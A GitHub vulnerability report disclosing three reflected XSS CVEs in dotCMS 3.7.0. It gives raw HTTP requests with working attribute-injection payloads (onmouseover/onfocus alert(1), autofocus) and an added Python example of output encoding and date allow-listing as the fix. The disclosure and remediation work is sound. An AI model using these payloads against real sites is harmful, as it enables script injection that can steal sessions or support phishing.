Multiple XSS in dotCMS - 3.7.0 #10643

Belladona-c0re opened this issue Feb 6, 2017 · 0 comments


commented Feb 6, 2017

The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.

XSS CVE-2017-5875 (Authentication Necessary):

POST /dotCMS/myAccount HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=D95CD5DB89C287CEA2234432695E867A; opvc=848b4f88-adbd-40d6-a69b-d4160a8410fa; sitevisitscookie=1; dmid=1969f627-d1c7-4955-8c96-945a612bb883; _ga=GA1.2.2066223524.1486029583; _ga=GA1.3.2066223524.1486029583; SHARED_SESSION_ID=UYBDKCZQ6YF0; DWRSESSIONID=GEXwqywzgm8NFrjv8YRJNCHj*Dl; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 202


XSS CVE-2017-5876:
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1

XSS CVE-2017-5877:

GET /about-us/locations/index?direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500


How to fix:
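
Added example, not part of the original issue and not dotCMS code: it takes the `date` and `direction` values from the two GET requests above, reflects them into a double-quoted attribute with and without output encoding, and asks an HTML parser which attributes result. The `<input>` template and all function names are assumptions for illustration; the report does not show the markup the values are reflected into.

```python
from datetime import date
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Parameter values copied from the two GET requests in the report, URL-decoded.
DATE_PARAM = unquote('2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute'
                     '%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q')
DIRECTION_PARAM = unquote('testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3')

# Hypothetical template (assumption): the value lands in a double-quoted attribute.
TEMPLATE = '<input type="text" name="q" value="{}">'


def render_unsafe(value):
    """Reflect the raw value, as the report describes the server doing."""
    return TEMPLATE.format(value)


def render_encoded(value):
    """Encode for the attribute context so a quote cannot end the value."""
    return TEMPLATE.format(escape(value, quote=True))


class _AttrCollector(HTMLParser):
    """Records the attributes an HTML parser sees on the <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_attrs(markup):
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs


def is_iso_date(value):
    """Allow-list check for the `date` parameter: accept only YYYY-MM-DD."""
    try:
        return date.fromisoformat(value).isoformat() == value
    except ValueError:
        return False
```

Encoding at the point of output covers both parameters; the allow-list check is an additional layer that only applies to `date`, whose format is known.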
